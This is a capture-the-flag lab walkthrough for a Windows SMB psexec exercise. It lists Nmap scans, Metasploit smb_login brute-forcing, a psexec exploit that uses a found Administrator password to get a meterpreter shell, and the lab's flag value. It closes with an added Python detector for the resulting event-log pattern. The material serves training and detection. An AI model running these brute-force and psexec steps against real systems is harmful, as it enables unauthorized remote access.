x3-Windows-SMB Server PSexec

Uploaded by mohammedgubran97
Name: Windows: SMB Server PSexec

URL: https://attackdefense.com/challengedetails?cid=1959

Type: Windows Exploitation: Services

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap 10.0.0.242


Step 3: We have discovered that multiple ports are open. The SMB port 445 is also exposed.
We will run an Nmap script to list the protocols and dialects supported by the SMB server.

Command: nmap -p445 --script smb-protocols 10.0.0.242

Step 4: We will run the smb_login module to find all the valid users and their passwords.

Commands:
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS 10.0.0.242
set VERBOSE false
exploit

We have found four valid users and their passwords.

Step 5: Running the psexec module to gain a meterpreter shell.

Commands:
use exploit/windows/smb/psexec
set RHOSTS 10.0.0.242
set SMBUser Administrator
set SMBPass qwertyuiop
exploit

We have received a meterpreter shell.

Step 6: Searching for the flag.

Commands:
shell
cd /
dir
type flag.txt

This reveals the flag to us.

Flag: e0da81a9cd42b261bc9b90d15f780433
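
On the target side, Steps 4 and 5 leave a recognizable sequence in the Windows event logs: a burst of failed network logons (event 4625), a successful one (4624), then a service installation (7045), since the psexec module runs its payload as a service. The detection logic below is an added example, not part of the original lab document; the record layout, source IPs, service names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, event_id, **fields):
    """Build one simplified event record (hypothetical export format)."""
    return {"time": datetime.fromisoformat(ts), "id": event_id, **fields}

# Constructed sample data, not output from the lab. Event IDs are the standard
# Windows ones: 4625 failed logon, 4624 successful logon (logon_type 3 =
# network, as used by SMB), 7045 service installed (System log, no source IP).
SAMPLE_EVENTS = [
    ev("2024-01-01T09:00:00", 4625, ip="10.0.0.77", user="alice", logon_type=3),
    ev("2024-01-01T09:00:20", 4624, ip="10.0.0.77", user="alice", logon_type=3),
    *[ev(f"2024-01-01T10:00:0{i}", 4625, ip="10.0.0.50", user=u, logon_type=3)
      for i, u in enumerate(["admin", "guest", "sysadmin", "root", "test",
                             "Administrator"])],
    ev("2024-01-01T10:00:07", 4624, ip="10.0.0.50", user="Administrator",
       logon_type=3),
    ev("2024-01-01T10:00:09", 7045, service="kXbTqLmZ"),
    ev("2024-01-01T15:00:00", 7045, service="UpdaterSvc"),
]

def detect_bruteforce_then_service(events, min_failures=5,
                                   window=timedelta(minutes=10)):
    """Flag a burst of failed network logons from one source, a success from
    that source, and a service install on the host shortly afterwards."""
    failures = defaultdict(list)  # source IP -> times of failed network logons
    suspects, alerts = [], []
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] == 4625 and e.get("logon_type") == 3:
            failures[e["ip"]].append(e["time"])
        elif e["id"] == 4624 and e.get("logon_type") == 3:
            recent = [t for t in failures[e["ip"]] if e["time"] - t <= window]
            if len(recent) >= min_failures:
                suspects.append({"ip": e["ip"], "user": e["user"],
                                 "time": e["time"], "failures": len(recent)})
        elif e["id"] == 7045:
            # 7045 carries no source address, so correlate by time on the host.
            for s in suspects:
                if e["time"] - s["time"] <= window:
                    alerts.append({**s, "service": e["service"]})
    return alerts

if __name__ == "__main__":
    for a in detect_bruteforce_then_service(SAMPLE_EVENTS):
        print(f"{a['time']} {a['ip']} -> {a['user']}: {a['failures']} failed "
              f"logons, then service '{a['service']}' installed")
```

The single failed logon from 10.0.0.77 and the service installed hours later stay below the thresholds, so only the 10.0.0.50 sequence is reported.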

References

1. Metasploit Modules
https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_login
https://www.rapid7.com/db/modules/exploit/windows/smb/psexec
